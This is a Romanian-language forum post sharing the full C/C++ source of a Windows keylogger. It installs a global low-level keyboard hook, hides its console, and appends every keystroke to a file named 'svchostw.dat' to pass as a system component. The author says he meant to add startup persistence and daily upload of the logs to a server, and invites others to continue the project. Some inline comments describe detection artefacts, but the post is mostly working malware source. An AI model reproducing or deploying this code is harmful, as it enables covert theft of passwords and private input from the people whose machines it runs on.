Zamolxis666

[C C++] Keylogger


Salutare,

Acum ceva timp in urma postase Slick un keylogger care "agata" un hook de tastatura si de fiecare data cand apasai o tasta iti semnala acest lucru printr-o pereche de paranteze afisate in consola.

Am modificat proiectul lui a.i. consola nu mai este afisata, iar tastele apasate sunt inregistrate intr-un fisier. Initial planuisem sa bag programul in registrii sa porneasca automat la startup, iar log-ul sa fie de asemenea urcat automat pe server 1 data /zi. Din pacate, timpul si problemele de acasa m-au facut sa renunt la proiect si il postez aici, in speranta ca cineva il va continua, sau va invata ceva folositor:


#include <windows.h>
#include <winuser.h>
#include <stdio.h>
#include <string.h>

// Handle returned by SetWindowsHookEx in KeyLogger; passed to CallNextHookEx and UnhookWindowsHookEx.
HHOOK hKeyHook; // the hook
// Toggle flags maintained by KeyEvent: each is flipped on a VK_SHIFT / VK_CAPITAL key-down.
// Both start as false.
bool shift = false;
bool caps = false;
// Log file handle; KeyEvent reopens "svchostw.dat" in append mode for every key it records.
FILE *f;

// Low-level keyboard hook procedure (installed with WH_KEYBOARD_LL by KeyLogger).
// For each key-down event (WM_KEYDOWN / WM_SYSKEYDOWN) it maps the virtual-key code to text
// and appends that text to "svchostw.dat"; all other events are only forwarded.
// The log is opened by relative name, so it is created in the process's current working directory.
// NOTE(review): the file name resembles a Windows system component name, presumably to blend in.
// For triage, the artefacts visible in this listing are that file (opened, appended and closed once
// per recorded key) and a process that holds a WH_KEYBOARD_LL hook.
// Always returns the result of CallNextHookEx, so the event is passed on down the hook chain.
// This function is exported from the executable in the same way as a function that is part of a DLL
__declspec(dllexport) LRESULT CALLBACK KeyEvent(int nCode,WPARAM wParam,LPARAM lParam)
{
// Only key-down notifications are examined; key-up events fall through to CallNextHookEx.
if((nCode == HC_ACTION) && ((wParam == WM_SYSKEYDOWN) || (wParam == WM_KEYDOWN)))
{
KBDLLHOOKSTRUCT hooked=*((KBDLLHOOKSTRUCT*)lParam); // various information about the pressed key
DWORD dwMsg=1; // never read in this function

// Shift: write a [SHIFT] marker and flip the flag (both branches log the same marker).
if(hooked.vkCode == VK_SHIFT && shift == false)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "[SHIFT]");
fclose(f);
shift = true;
}
else if(hooked.vkCode == VK_SHIFT && shift == true)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "[SHIFT]");
fclose(f);
shift = false;
}
// Caps Lock: flip the flag; nothing is written to the log.
else if(hooked.vkCode == VK_CAPITAL && caps == true)
caps = false;
else if(hooked.vkCode == VK_CAPITAL && caps == false)
caps = true;
// Letters A-Z (0x41-0x5A): logged as-is when either flag is set, otherwise lower-cased.
else if((0x41 <= hooked.vkCode && hooked.vkCode <= 0x5A) && (caps || shift))
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%c", hooked.vkCode);
fclose(f);
}
else if((0x41 <= hooked.vkCode && hooked.vkCode <= 0x5A) && (caps==false && shift == false))
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%c", tolower(hooked.vkCode));
fclose(f);
}
// Numeric keypad digits: subtracting 0x60 turns the key code into the digit value.
else if(VK_NUMPAD0 <= hooked.vkCode && hooked.vkCode <= VK_NUMPAD9)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%d", hooked.vkCode - 0x60);
fclose(f);
}
// Top-row digits (0x30-0x39): subtracting 0x30 turns the key code into the digit value.
else if(0x30 <= hooked.vkCode && hooked.vkCode <= 0x39)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%d", hooked.vkCode - 0x30);
fclose(f);
}
// OEM punctuation keys: logged as a bracketed pair of characters, independent of the shift flag.
else if(hooked.vkCode == VK_OEM_1)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "[;:]");
fclose(f);
}
else if(hooked.vkCode == VK_OEM_2)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "[/?]");
fclose(f);
}
else if(hooked.vkCode == VK_OEM_3)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "[`~]");
fclose(f);
}
else if(hooked.vkCode == VK_OEM_4)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "[ [{ ]");
fclose(f);
}
else if(hooked.vkCode == VK_OEM_5)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "[\\|]");
fclose(f);
}
else if(hooked.vkCode == VK_OEM_6)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "[ ]} ]");
fclose(f);
}
else if(hooked.vkCode == VK_OEM_7)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "['\"]");
fclose(f);
}
// These four OEM keys are logged as a single unbracketed character.
else if(hooked.vkCode == VK_OEM_PLUS)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "+");
fclose(f);
}
else if(hooked.vkCode == VK_OEM_COMMA)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", ",");
fclose(f);
}
else if(hooked.vkCode == VK_OEM_MINUS)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "-");
fclose(f);
}
else if(hooked.vkCode == VK_OEM_PERIOD)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", ".");
fclose(f);
}
// Enter becomes a newline in the log; Tab, Delete and Backspace become bracketed markers.
else if(hooked.vkCode == VK_RETURN)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "\n");
fclose(f);
}
else if(hooked.vkCode == VK_TAB)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "[TAB]");
fclose(f);
}
else if(hooked.vkCode == VK_DELETE)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "[DEL]");
fclose(f);
}
else if(hooked.vkCode == VK_BACK)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", "[BACK]");
fclose(f);
}
else if(hooked.vkCode == VK_SPACE)
{
f = fopen("svchostw.dat", "a");
fprintf(f, "%s", " ");
fclose(f);
}
// Any key code not matched above is not recorded.

}
// Forward the event unchanged to the next hook in the chain.
return CallNextHookEx(hKeyHook,nCode,wParam,lParam);
}

// a message loop used to block execution while keys are being logged
// Runs until GetMessage returns 0; KeyLogger calls it right after installing the hook,
// so the calling thread stays alive and keeps retrieving messages while the hook is installed.
void MsgLoop()
{
MSG message;
while(GetMessage(&message,NULL,0,0))
{
TranslateMessage(&message);
DispatchMessage(&message);
}
}

// installs the hook and starts the loop for capturing pressed keys
// Thread entry point started from main; lpParameter is argv[0] (the program path as passed by main).
// Returns 1 if no module handle can be obtained, otherwise 0 after the message loop ends.
// For reviewers: the SetWindowsHookEx call with WH_KEYBOARD_LL below is the behaviour that
// identifies this listing as a keystroke logger when examining imports or API-call telemetry.
DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
// Module handle of the running executable; LoadLibrary on lpParameter is only a fallback.
HINSTANCE hExe=GetModuleHandle(NULL);
if (!hExe) hExe=LoadLibrary((LPCWSTR) lpParameter);
if (!hExe) return 1; // error, exit the program
// The last argument (thread id) is 0, so the hook is not limited to a single thread.
hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL,(HOOKPROC) KeyEvent,hExe,0); // install the hook
MsgLoop(); // wait for key presses
UnhookWindowsHookEx(hKeyHook); // uninstall the hook
return 0;
}

// Program entry point: starts KeyLogger on a separate thread and blocks until that thread ends.
// Returns the WaitForSingleObject result when the thread was created, or 1 if CreateThread failed.
int main(int argc, char** argv)
{
HANDLE hThread;
DWORD dwThread;
DWORD exThread; // declared but not used in this function

hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)KeyLogger, (LPVOID) argv[0], 0, &dwThread); // start the logging function in another thread
if(hThread)
{
// INFINITE timeout: the process stays resident for as long as the hook thread runs.
return WaitForSingleObject(hThread,INFINITE);
}
else
{
return 1;
}
}

link to pastebin:

[C] KLg - Pastebin.com

Toate cele bune
